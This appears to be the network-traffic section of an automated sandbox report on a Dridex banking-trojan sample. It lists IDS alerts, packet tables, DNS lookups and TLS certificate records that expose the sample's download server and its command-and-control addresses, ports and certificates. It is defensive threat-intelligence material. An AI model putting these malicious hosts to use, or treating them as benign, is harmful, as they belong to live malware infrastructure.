                                                                                                                              01/12/21-07:45:17.049262TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434936077.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:45:17.574252TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084936180.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:45:18.094642TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493625.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:45:18.094642TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493625.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:45:19.138650TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434936477.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:45:19.661561TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084936580.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:45:20.210853TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493665.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:45:20.210853TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493665.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:45:21.244669TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434936877.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:45:21.771560TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084936980.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:45:22.318126TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493705.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:45:22.318126TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493705.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:45:23.379293TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434937277.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:45:23.946645TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084937380.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:45:24.534297TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493745.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:45:24.534297TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493745.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:45:25.655994TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434937677.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:45:26.164890TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084937780.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:45:26.685547TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493785.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:45:26.685547TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493785.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:45:27.717140TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434938077.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:45:28.250041TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084938180.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:45:28.776439TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493825.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:45:28.776439TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493825.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:45:30.254416TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434938477.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:45:30.799057TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084938580.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:45:31.325609TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493865.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:45:31.325609TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493865.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:45:32.367144TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434938877.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:45:32.896746TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084938980.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:45:33.437031TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493905.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:45:33.437031TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493905.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:45:34.489134TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434939277.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:45:35.019822TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084939380.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:45:35.553464TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493945.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:45:35.553464TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493945.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:45:36.308810TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434939677.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:45:36.842305TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084939780.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:45:37.392102TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493985.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:45:37.392102TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493985.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:45:38.451756TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434940077.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:45:38.957005TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084940180.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:45:39.484599TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389494025.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:45:39.484599TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389494025.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:45:40.549096TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434940477.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:45:41.074283TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084940580.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:45:41.617666TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389494065.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:45:41.617666TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389494065.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:45:42.692789TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434940877.220.64.37192.168.2.22
                                                                                                                              01/12/21-07:45:43.214602TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084940980.86.91.27192.168.2.22
                                                                                                                              01/12/21-07:45:43.737164TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389494105.100.228.233192.168.2.22
                                                                                                                              01/12/21-07:45:43.737164TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389494105.100.228.233192.168.2.22

                                                                                                                              Network Port Distribution

                                                                                                                              TCP Packets

                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Jan 12, 2021 07:43:27.240169048 CET49167443192.168.2.22217.174.149.3
                                                                                                                              Jan 12, 2021 07:43:27.321654081 CET44349167217.174.149.3192.168.2.22
                                                                                                                              Jan 12, 2021 07:43:27.321736097 CET49167443192.168.2.22217.174.149.3
                                                                                                                              Jan 12, 2021 07:43:27.331224918 CET49167443192.168.2.22217.174.149.3
                                                                                                                              Jan 12, 2021 07:43:27.412463903 CET44349167217.174.149.3192.168.2.22
                                                                                                                              Jan 12, 2021 07:43:27.414689064 CET44349167217.174.149.3192.168.2.22
                                                                                                                              Jan 12, 2021 07:43:27.414797068 CET44349167217.174.149.3192.168.2.22
                                                                                                                              Jan 12, 2021 07:43:27.414814949 CET44349167217.174.149.3192.168.2.22
                                                                                                                              Jan 12, 2021 07:43:27.414841890 CET49167443192.168.2.22217.174.149.3
                                                                                                                              Jan 12, 2021 07:43:27.414869070 CET49167443192.168.2.22217.174.149.3
                                                                                                                              Jan 12, 2021 07:43:27.414881945 CET49167443192.168.2.22217.174.149.3
                                                                                                                              Jan 12, 2021 07:43:27.427311897 CET49167443192.168.2.22217.174.149.3
                                                                                                                              Jan 12, 2021 07:43:27.508760929 CET44349167217.174.149.3192.168.2.22
                                                                                                                              Jan 12, 2021 07:43:27.508929968 CET49167443192.168.2.22217.174.149.3
                                                                                                                              Jan 12, 2021 07:43:29.154236078 CET49167443192.168.2.22217.174.149.3
                                                                                                                              Jan 12, 2021 07:43:29.241509914 CET44349167217.174.149.3192.168.2.22
                                                                                                                              Jan 12, 2021 07:43:29.241545916 CET44349167217.174.149.3192.168.2.22
                                                                                                                              Jan 12, 2021 07:43:29.241616011 CET44349167217.174.149.3192.168.2.22
                                                                                                                              Jan 12, 2021 07:43:29.241676092 CET44349167217.174.149.3192.168.2.22
                                                                                                                              Jan 12, 2021 07:43:29.241772890 CET49167443192.168.2.22217.174.149.3
                                                                                                                              Jan 12, 2021 07:43:29.241797924 CET44349167217.174.149.3192.168.2.22
                                                                                                                              Jan 12, 2021 07:43:29.241822004 CET49167443192.168.2.22217.174.149.3
                                                                                                                              Jan 12, 2021 07:43:29.241839886 CET49167443192.168.2.22217.174.149.3
                                                                                                                              Jan 12, 2021 07:43:29.241911888 CET44349167217.174.149.3192.168.2.22
                                                                                                                              Jan 12, 2021 07:43:29.241949081 CET49167443192.168.2.22217.174.149.3
                                                                                                                              Jan 12, 2021 07:43:29.242034912 CET44349167217.174.149.3192.168.2.22
                                                                                                                              Jan 12, 2021 07:43:29.242073059 CET49167443192.168.2.22217.174.149.3
                                                                                                                              Jan 12, 2021 07:43:29.242146969 CET44349167217.174.149.3192.168.2.22
                                                                                                                              Jan 12, 2021 07:43:29.242185116 CET49167443192.168.2.22217.174.149.3
                                                                                                                              Jan 12, 2021 07:43:29.242253065 CET44349167217.174.149.3192.168.2.22
                                                                                                                              Jan 12, 2021 07:43:29.242296934 CET49167443192.168.2.22217.174.149.3
                                                                                                                              Jan 12, 2021 07:43:29.242441893 CET44349167217.174.149.3192.168.2.22
                                                                                                                              Jan 12, 2021 07:43:29.242583990 CET49167443192.168.2.22217.174.149.3
                                                                                                                              Jan 12, 2021 07:43:29.244363070 CET49167443192.168.2.22217.174.149.3
                                                                                                                              Jan 12, 2021 07:43:29.323227882 CET44349167217.174.149.3192.168.2.22
                                                                                                                              Jan 12, 2021 07:43:29.323257923 CET44349167217.174.149.3192.168.2.22
                                                                                                                              Jan 12, 2021 07:43:29.323318005 CET44349167217.174.149.3192.168.2.22
                                                                                                                              Jan 12, 2021 07:43:29.323432922 CET44349167217.174.149.3192.168.2.22
                                                                                                                              Jan 12, 2021 07:43:29.323471069 CET49167443192.168.2.22217.174.149.3
                                                                                                                              Jan 12, 2021 07:43:29.323499918 CET49167443192.168.2.22217.174.149.3
                                                                                                                              Jan 12, 2021 07:43:29.323506117 CET49167443192.168.2.22217.174.149.3
                                                                                                                              Jan 12, 2021 07:43:29.323549032 CET44349167217.174.149.3192.168.2.22
                                                                                                                              Jan 12, 2021 07:43:29.323584080 CET49167443192.168.2.22217.174.149.3
                                                                                                                              Jan 12, 2021 07:43:29.323682070 CET44349167217.174.149.3192.168.2.22
                                                                                                                              Jan 12, 2021 07:43:29.323713064 CET49167443192.168.2.22217.174.149.3
                                                                                                                              Jan 12, 2021 07:43:29.323798895 CET44349167217.174.149.3192.168.2.22
                                                                                                                              Jan 12, 2021 07:43:29.323832989 CET49167443192.168.2.22217.174.149.3
                                                                                                                              Jan 12, 2021 07:43:29.323923111 CET44349167217.174.149.3192.168.2.22
                                                                                                                              Jan 12, 2021 07:43:29.323956966 CET49167443192.168.2.22217.174.149.3
                                                                                                                              Jan 12, 2021 07:43:29.324007988 CET44349167217.174.149.3192.168.2.22
                                                                                                                              Jan 12, 2021 07:43:29.324042082 CET49167443192.168.2.22217.174.149.3
                                                                                                                              Jan 12, 2021 07:43:29.324076891 CET44349167217.174.149.3192.168.2.22
                                                                                                                              Jan 12, 2021 07:43:29.324109077 CET49167443192.168.2.22217.174.149.3
                                                                                                                              Jan 12, 2021 07:43:29.324238062 CET44349167217.174.149.3192.168.2.22
                                                                                                                              Jan 12, 2021 07:43:29.324271917 CET49167443192.168.2.22217.174.149.3
                                                                                                                              Jan 12, 2021 07:43:29.324318886 CET44349167217.174.149.3192.168.2.22
                                                                                                                              Jan 12, 2021 07:43:29.324351072 CET49167443192.168.2.22217.174.149.3
                                                                                                                              Jan 12, 2021 07:43:29.324429989 CET44349167217.174.149.3192.168.2.22
                                                                                                                              Jan 12, 2021 07:43:29.324465036 CET49167443192.168.2.22217.174.149.3
                                                                                                                              Jan 12, 2021 07:43:29.324558020 CET44349167217.174.149.3192.168.2.22
                                                                                                                              Jan 12, 2021 07:43:29.324589968 CET49167443192.168.2.22217.174.149.3
                                                                                                                              Jan 12, 2021 07:43:29.324681997 CET44349167217.174.149.3192.168.2.22
                                                                                                                              Jan 12, 2021 07:43:29.324738979 CET49167443192.168.2.22217.174.149.3
                                                                                                                              Jan 12, 2021 07:43:29.324803114 CET44349167217.174.149.3192.168.2.22
                                                                                                                              Jan 12, 2021 07:43:29.324846029 CET49167443192.168.2.22217.174.149.3
                                                                                                                              Jan 12, 2021 07:43:29.324872971 CET44349167217.174.149.3192.168.2.22
                                                                                                                              Jan 12, 2021 07:43:29.324908018 CET49167443192.168.2.22217.174.149.3
                                                                                                                              Jan 12, 2021 07:43:29.325015068 CET44349167217.174.149.3192.168.2.22
                                                                                                                              Jan 12, 2021 07:43:29.325052977 CET49167443192.168.2.22217.174.149.3
                                                                                                                              Jan 12, 2021 07:43:29.325126886 CET44349167217.174.149.3192.168.2.22
                                                                                                                              Jan 12, 2021 07:43:29.325165033 CET49167443192.168.2.22217.174.149.3
                                                                                                                              Jan 12, 2021 07:43:29.325248957 CET44349167217.174.149.3192.168.2.22
                                                                                                                              Jan 12, 2021 07:43:29.325287104 CET49167443192.168.2.22217.174.149.3
                                                                                                                              Jan 12, 2021 07:43:29.325761080 CET49167443192.168.2.22217.174.149.3
                                                                                                                              Jan 12, 2021 07:43:29.404982090 CET44349167217.174.149.3192.168.2.22
                                                                                                                              Jan 12, 2021 07:43:29.405038118 CET44349167217.174.149.3192.168.2.22
                                                                                                                              Jan 12, 2021 07:43:29.405061960 CET44349167217.174.149.3192.168.2.22
                                                                                                                              Jan 12, 2021 07:43:29.405147076 CET44349167217.174.149.3192.168.2.22
                                                                                                                              Jan 12, 2021 07:43:29.405217886 CET49167443192.168.2.22217.174.149.3
                                                                                                                              Jan 12, 2021 07:43:29.405247927 CET49167443192.168.2.22217.174.149.3
                                                                                                                              Jan 12, 2021 07:43:29.405263901 CET44349167217.174.149.3192.168.2.22
                                                                                                                              Jan 12, 2021 07:43:29.405323029 CET49167443192.168.2.22217.174.149.3
                                                                                                                              Jan 12, 2021 07:43:29.405349970 CET44349167217.174.149.3192.168.2.22
                                                                                                                              Jan 12, 2021 07:43:29.405421019 CET49167443192.168.2.22217.174.149.3
                                                                                                                              Jan 12, 2021 07:43:29.405481100 CET44349167217.174.149.3192.168.2.22
                                                                                                                              Jan 12, 2021 07:43:29.405543089 CET49167443192.168.2.22217.174.149.3
                                                                                                                              Jan 12, 2021 07:43:29.405581951 CET44349167217.174.149.3192.168.2.22
                                                                                                                              Jan 12, 2021 07:43:29.405637026 CET49167443192.168.2.22217.174.149.3
                                                                                                                              Jan 12, 2021 07:43:29.405699968 CET44349167217.174.149.3192.168.2.22
                                                                                                                              Jan 12, 2021 07:43:29.405751944 CET49167443192.168.2.22217.174.149.3
                                                                                                                              Jan 12, 2021 07:43:29.405776978 CET44349167217.174.149.3192.168.2.22
                                                                                                                              Jan 12, 2021 07:43:29.405829906 CET49167443192.168.2.22217.174.149.3
                                                                                                                              Jan 12, 2021 07:43:29.405895948 CET44349167217.174.149.3192.168.2.22
                                                                                                                              Jan 12, 2021 07:43:29.405941010 CET49167443192.168.2.22217.174.149.3
                                                                                                                              Jan 12, 2021 07:43:29.406006098 CET44349167217.174.149.3192.168.2.22
                                                                                                                              Jan 12, 2021 07:43:29.406059980 CET49167443192.168.2.22217.174.149.3
                                                                                                                              Jan 12, 2021 07:43:29.406133890 CET44349167217.174.149.3192.168.2.22
                                                                                                                              Jan 12, 2021 07:43:29.406188011 CET49167443192.168.2.22217.174.149.3
                                                                                                                              Jan 12, 2021 07:43:29.406233072 CET44349167217.174.149.3192.168.2.22
                                                                                                                              Jan 12, 2021 07:43:29.406290054 CET49167443192.168.2.22217.174.149.3

                                                                                                                              UDP Packets

                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Jan 12, 2021 07:43:27.014373064 CET5219753192.168.2.228.8.8.8
                                                                                                                              Jan 12, 2021 07:43:27.229727983 CET53521978.8.8.8192.168.2.22
                                                                                                                              Jan 12, 2021 07:43:27.891366959 CET5309953192.168.2.228.8.8.8
                                                                                                                              Jan 12, 2021 07:43:27.939203024 CET53530998.8.8.8192.168.2.22
                                                                                                                              Jan 12, 2021 07:43:27.946752071 CET5283853192.168.2.228.8.8.8
                                                                                                                              Jan 12, 2021 07:43:27.994427919 CET53528388.8.8.8192.168.2.22
                                                                                                                              Jan 12, 2021 07:43:28.559076071 CET6120053192.168.2.228.8.8.8
                                                                                                                              Jan 12, 2021 07:43:28.606836081 CET53612008.8.8.8192.168.2.22
                                                                                                                              Jan 12, 2021 07:43:28.612761021 CET4954853192.168.2.228.8.8.8
                                                                                                                              Jan 12, 2021 07:43:28.668925047 CET53495488.8.8.8192.168.2.22
                                                                                                                              Jan 12, 2021 07:44:05.943444014 CET5562753192.168.2.228.8.8.8
                                                                                                                              Jan 12, 2021 07:44:05.991348028 CET53556278.8.8.8192.168.2.22
                                                                                                                              Jan 12, 2021 07:44:06.011027098 CET5600953192.168.2.228.8.8.8
                                                                                                                              Jan 12, 2021 07:44:06.058880091 CET53560098.8.8.8192.168.2.22
                                                                                                                              Jan 12, 2021 07:44:07.279355049 CET6186553192.168.2.228.8.8.8
                                                                                                                              Jan 12, 2021 07:44:07.327223063 CET53618658.8.8.8192.168.2.22
                                                                                                                              Jan 12, 2021 07:44:07.350521088 CET5517153192.168.2.228.8.8.8
                                                                                                                              Jan 12, 2021 07:44:07.401139021 CET53551718.8.8.8192.168.2.22

                                                                                                                              DNS Queries

                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                              Jan 12, 2021 07:43:27.014373064 CET192.168.2.228.8.8.80x7e45Standard query (0)media-server.skyinternet.com.pkA (IP address)IN (0x0001)

                                                                                                                              DNS Answers

                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                              Jan 12, 2021 07:43:27.229727983 CET8.8.8.8192.168.2.220x7e45No error (0)media-server.skyinternet.com.pk217.174.149.3A (IP address)IN (0x0001)
                                                                                                                              Jan 12, 2021 07:44:07.327223063 CET8.8.8.8192.168.2.220x20ecNo error (0)cdn.digicertcdn.com104.18.10.39A (IP address)IN (0x0001)
                                                                                                                              Jan 12, 2021 07:44:07.327223063 CET8.8.8.8192.168.2.220x20ecNo error (0)cdn.digicertcdn.com104.18.11.39A (IP address)IN (0x0001)
                                                                                                                              Jan 12, 2021 07:44:07.401139021 CET8.8.8.8192.168.2.220x3a02No error (0)cdn.digicertcdn.com104.18.11.39A (IP address)IN (0x0001)
                                                                                                                              Jan 12, 2021 07:44:07.401139021 CET8.8.8.8192.168.2.220x3a02No error (0)cdn.digicertcdn.com104.18.10.39A (IP address)IN (0x0001)

                                                                                                                              HTTPS Packets

                                                                                                                              TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                              Jan 12, 2021 07:43:27.414814949 CET217.174.149.3443192.168.2.2249167CN=www.media-server.skyinternet.com.pk CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=USCN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Fri Nov 20 18:15:41 CET 2020 Thu Mar 17 17:40:46 CET 2016Thu Feb 18 18:15:41 CET 2021 Wed Mar 17 17:40:46 CET 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                                                                              CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Thu Mar 17 17:40:46 CET 2016Wed Mar 17 17:40:46 CET 2021
                                                                                                                              Jan 12, 2021 07:43:33.658950090 CET77.220.64.37443192.168.2.2249170CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:43:37.826246977 CET77.220.64.37443192.168.2.2249174CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:43:39.901704073 CET77.220.64.37443192.168.2.2249178CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:43:41.993721008 CET77.220.64.37443192.168.2.2249182CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:43:44.079883099 CET77.220.64.37443192.168.2.2249186CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:43:46.137309074 CET77.220.64.37443192.168.2.2249190CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:43:48.184794903 CET77.220.64.37443192.168.2.2249194CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:43:50.256206989 CET77.220.64.37443192.168.2.2249198CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:43:52.587001085 CET77.220.64.37443192.168.2.2249202CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:43:55.827255964 CET77.220.64.37443192.168.2.2249206CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:43:57.870600939 CET77.220.64.37443192.168.2.2249210CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:43:59.946667910 CET77.220.64.37443192.168.2.2249214CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                              Jan 12, 2021 07:44:01.972985983 CET77.220.64.37443192.168.2.2249218CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
